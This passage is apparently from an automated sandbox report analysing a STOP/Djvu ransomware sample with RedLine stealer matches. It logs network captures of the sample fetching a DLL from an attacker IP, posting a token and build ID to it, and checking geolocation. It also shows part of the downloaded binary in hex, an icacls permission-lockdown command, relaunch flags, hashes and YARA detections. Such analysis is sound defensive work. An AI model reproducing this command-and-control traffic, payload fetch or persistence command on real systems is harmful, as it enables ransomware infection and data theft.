name="build_id"1706dc6c9202430bc6fb2e74896d8311------EHCFBFBAEBKJKEBGCAEHCont
2024-04-24 12:47:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 12:47:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 12:47:20 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:20 UTC	177	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:21 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 12:47:20 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Sun, 14 Apr 2024 18:52:51 GMT Connection: close ETag: "661c2603-258600" Accept-Ranges: bytes
2024-04-24 12:47:21 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-24 12:47:21 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-24 12:47:21 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-24 12:47:22 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-24 12:47:22 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-24 12:47:22 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-24 12:47:22 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-04-24 12:47:22 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-24 12:47:22 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-24 12:47:22 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:24 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:24 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 63 33 61 30 39 62 39 37 64 35 37 66 37 38 31 66 62 62 34 39 62 37 63 61 64 64 30 64 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"d2c3a09b97d57f781fbb49b7cadd0d1c------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------KEGDAKEHJDHIDHJJDAECCont
2024-04-24 12:47:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 12:47:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 12:47:25 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:51 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-24 12:47:52 UTC	912	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 24 Apr 2024 12:47:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g6mWHEGjE4KTIfp5yRNwm2zVQliRGr66DCumWV66vqlY9C3RIHP%2FCq%2FgMmgTFCTiLvK18TI2ssaH5XHGgy0jm8PyIjVXbB1UE7X%2FYuyPOsYga88PBPX61mW02heo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8796344d4a7b7ca3-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 12:47:52 UTC	457	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 36 61 65 61 33 61 61 62 36 38 36 66 34 61 66 62 36 65 38 61 62 61 33 66 39 62 35 62 33 61 34 61 63 61 33 61 35 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#c6aea3aab686f4afb6e8aba3f9b5b3a4aca3a5
2024-04-24 12:47:52 UTC	473	IN	Data Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 66 38 39 30 39 64 39 34 38 38 62 38 63 61 39 31 38 38 64 36 38 64 39 39 63 37 38 62 38 64 39 61 39 32 39 64 39 62 38 63 63 35 63 61 39 31 38 38 64 36 38 64 39 39 22 3e Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#f8909d9488b8ca9188d68d99c78b8d9a929d9b8cc5ca9188d68d99">
2024-04-24 12:47:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:48:07 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-24 12:48:07 UTC	916	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 24 Apr 2024 12:48:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4OKV9UHxPLfuQr8%2BsFnolMKHYc4283XaOnI9i%2B%2FbGnbwgevgyRMnomm%2BVw0zoHdr6wbRpS6pIFcPoxdPXNami6XCDyH7TbNiVVxpEC2h1bpPY3gwBDumSL5Yn%2F6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 879634ad7a4352b9-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 12:48:07 UTC	453	IN	Data Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 38 37 65 66 65 32 65 62 66 37 63 37 62 35 65 65 66 37 61 39 65 61 65 32 62 38 66 34 66 32 65 35 65 64 65 32 65 34 Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#87efe2ebf7c7b5eef7a9eae2b8f4f2e5ede2e4
2024-04-24 12:48:07 UTC	369	IN	Data Raw: 20 d0 ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 38 62 65 33 65 65 65 37 66 62 63 62 62 39 65 32 66 62 61 35 66 65 65 61 62 34 66 38 66 65 65 39 65 31 65 65 65 38 66 66 62 36 62 39 65 32 66 62 61 35 66 65 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#8be3eee7fbcbb9e2fba5feeab4f8fee9e1eee8ffb6b9e2fba5fe
2024-04-24 12:48:07 UTC	114	IN	Data Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2024-04-24 12:48:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:46:58
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\sIQywRNC5M.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\sIQywRNC5M.exe"
Imagebase:	0x400000
File size:	780'288 bytes
MD5 hash:	03CEA6F6022A3A08D1EA003091A3E502
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2029947152.0000000004449000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	14:47:00
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0xf30000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	14:47:01
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\sIQywRNC5M.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	780'288 bytes
MD5 hash:	03CEA6F6022A3A08D1EA003091A3E502
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	14:47:03
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe --Task
Imagebase:	0x400000
File size:	780'288 bytes
MD5 hash:	03CEA6F6022A3A08D1EA003091A3E502
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Target ID:	8
Start time:	14:47:07
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe
Wow64 process (32bit):	true
